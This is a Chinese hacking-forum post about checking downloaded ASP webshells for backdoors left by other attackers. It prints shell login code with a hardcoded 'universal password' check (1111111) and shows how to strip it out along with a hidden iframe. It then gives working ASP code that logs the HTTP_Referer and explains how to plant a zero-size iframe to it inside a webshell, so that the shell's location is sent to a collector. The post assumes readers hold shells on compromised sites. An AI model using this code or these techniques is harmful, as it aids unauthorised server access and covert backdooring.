data:image/s3,"s3://crabby-images/eca9f/eca9f2f56c05c552c853355d850e1be1b77847b1" alt="Rank: 5" data:image/s3,"s3://crabby-images/55d42/55d42d19a311950367b6865f5dcfa0ed433eaef9" alt="Rank: 5"
- 帖子
- 145
- 积分
- 515
- 威望
- 744
- 金钱
- 510
- 在线时间
- 25 小时
data:image/s3,"s3://crabby-images/9ae68/9ae686c72fd588bd7968d64fc16b8b60a73761c2" alt="高手勋章 高手勋章" data:image/s3,"s3://crabby-images/e6314/e631450ec076e04beca50708b36d5c815d6e95e6" alt="原创奖章 原创奖章" data:image/s3,"s3://crabby-images/618c3/618c3775f6082b4f2f9883b841097582b9cf67d9" alt="贡献奖 贡献奖" data:image/s3,"s3://crabby-images/ccea7/ccea754c16c006eaac7a96f5b73f0d004d0ccb45" alt="帅哥勋章 帅哥勋章" data:image/s3,"s3://crabby-images/b7994/b7994d87c6094df496ed726b46ac9e9625d9a42c" alt="支持奖章 支持奖章" data:image/s3,"s3://crabby-images/55154/551549a43b8b41730409c4a970b2358b5153ff45" alt="突出贡献奖 突出贡献奖" data:image/s3,"s3://crabby-images/63d52/63d5297982a03d194afcb13981f3232a383b8e34" alt="优质人品奖章 优质人品奖章" data:image/s3,"s3://crabby-images/b23b3/b23b3fed8495e8121d3d2728c95aaa8a3246c2e7" alt="论坛元老 论坛元老"
|
我等小菜自己写不来asp马,只能用大虾写的,但网上流传的都不知道是几手的了
难免有些居心不良的人会在里面加后门。
好不容易拿到个shell又被别人偷走了怎么甘心啊!
所以在下完asp木马后要先检查有没后门,
通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密 asp木马解密工具
解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录
正常的:EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"
加油万能密码的:
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"
1111111就是传说中的万能密码了。
找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!
下面来找马大多数都喜欢用框架挂马:<iframe src=后门地址 width=0 height=0></iframe>
找到后删了,到此asp后门就算剔除了!
下面教大家后门的原理:
这是一段收信的asp代码将其保存为1.asp
<%url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>
代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址
简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里
上传到空间比如 http://127.0.0.1/1.asp
然后里用<iframe src=http://127.0.0.1/1.asp width=0 height=0></iframe>插到asp木马中
那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了
我们学习他是为了更好的理解,大家千万别用来整菜鸟! |
-
1
评分人数
-
|